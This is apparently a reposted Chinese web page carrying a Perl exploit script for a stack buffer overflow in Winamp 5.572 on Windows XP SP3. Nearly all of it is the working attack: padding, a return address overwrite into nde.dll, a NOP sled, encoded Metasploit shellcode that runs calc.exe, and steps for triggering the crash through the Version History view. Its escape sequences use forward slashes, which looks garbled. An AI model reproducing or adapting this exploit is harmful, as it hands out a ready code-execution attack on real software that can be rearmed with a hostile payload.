|
Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞
|
|
# Tested on: WinXP SP3 De
#!/usr/bin/perl # Still learning, having some fun... # Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki # Special greetz do Debug, even i dont know you. Nice find man. # Exploit has something around 70% chance of success. print "/n#########################################/n"; print "# Winamp 5.572 stack buffer overflow #/n"; print "# PoC by: Debug (eldadru/@gmail.com) #/n"; print "# Exploit by: NeoCortex (ICQ 158005940) #/n"; print "#########################################/n"; print " __ __________________/n"; print " ________ / // / / ____ / ____ / ________/n"; print " ________ /_______/ / /// // / / /___/ / / / / /_______/ ________ /n"; print " /_______/ _______ / / // // / / /_____/ / / / ________ /_______//n"; print " /_______/ / / // /// / /_____/ /___/ / /_______//n"; print " /_/ //__/_______/_______//n"; print " Where's the next phone box to the matrix please?/n/n/n"; my $version = "Winamp 5.572"; my $junk = "/x41" x 540; my $eip = "/xad/x86/x0e/x07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll my $nop = "/x90" x 100; my $shellcode = # payload taken from 
http://www.metasploit.com
# windows/exec cmd=calc.exe "/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49". "/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x48/x5a/x6a/x47". "/x58/x30/x42/x31/x50/x42/x41/x6b/x42/x41/x57/x42/x32/x42/x41/x32". "/x41/x41/x30/x41/x41/x58/x50/x38/x42/x42/x75/x78/x69/x6b/x4c/x6a". "/x48/x53/x74/x67/x70/x67/x70/x75/x50/x4e/x6b/x53/x75/x65/x6c/x6e". "/x6b/x51/x6c/x46/x65/x70/x78/x43/x31/x68/x6f/x4e/x6b/x30/x4f/x54". "/x58/x6e/x6b/x73/x6f/x57/x50/x67/x71/x58/x6b/x77/x39/x4c/x4b/x64". "/x74/x6c/x4b/x57/x71/x5a/x4e/x76/x51/x49/x50/x6e/x79/x6e/x4c/x4f". "/x74/x4b/x70/x70/x74/x37/x77/x69/x51/x48/x4a/x64/x4d/x43/x31/x4f". "/x32/x7a/x4b/x48/x74/x55/x6b/x72/x74/x34/x64/x77/x74/x70/x75/x4d". "/x35/x6c/x4b/x71/x4f/x75/x74/x36/x61/x48/x6b/x41/x76/x4c/x4b/x44". "/x4c/x70/x4b/x4e/x6b/x63/x6f/x55/x4c/x33/x31/x68/x6b/x4e/x6b/x35". "/x4c/x4e/x6b/x34/x41/x6a/x4b/x6c/x49/x33/x6c/x35/x74/x64/x44/x4a". "/x63/x34/x71/x4b/x70/x63/x54/x6e/x6b/x71/x50/x76/x50/x4f/x75/x4b". "/x70/x72/x58/x74/x4c/x4c/x4b/x77/x30/x76/x6c/x4c/x4b/x44/x30/x57". "/x6c/x6c/x6d/x6e/x6b/x75/x38/x54/x48/x58/x6b/x73/x39/x6e/x6b/x4b". "/x30/x4e/x50/x37/x70/x67/x70/x37/x70/x6c/x4b/x62/x48/x45/x6c/x63". "/x6f/x35/x61/x39/x66/x35/x30/x50/x56/x4d/x59/x48/x78/x6e/x63/x59". "/x50/x43/x4b/x66/x30/x43/x58/x68/x70/x6f/x7a/x43/x34/x33/x6f/x73". "/x58/x4f/x68/x6b/x4e/x6d/x5a/x46/x6e/x72/x77/x6b/x4f/x78/x67/x63". "/x53/x62/x41/x30/x6c/x55/x33/x64/x6e/x42/x45/x70/x78/x32/x45/x33". "/x30/x47"; open (myfile,'>> whatsnew.txt'); print myfile $version.$junk.$eip.$nop.$shellcode; print "[+] whatsnew.txt written./n"; print "[ ] Now copy it to your winamp folder.../n"; print "[ ] Run winamp and hit [About Winamp]->[Version History]/n"; |
Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞
最新推荐文章于 2018-06-06 17:03:33 发布
178
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
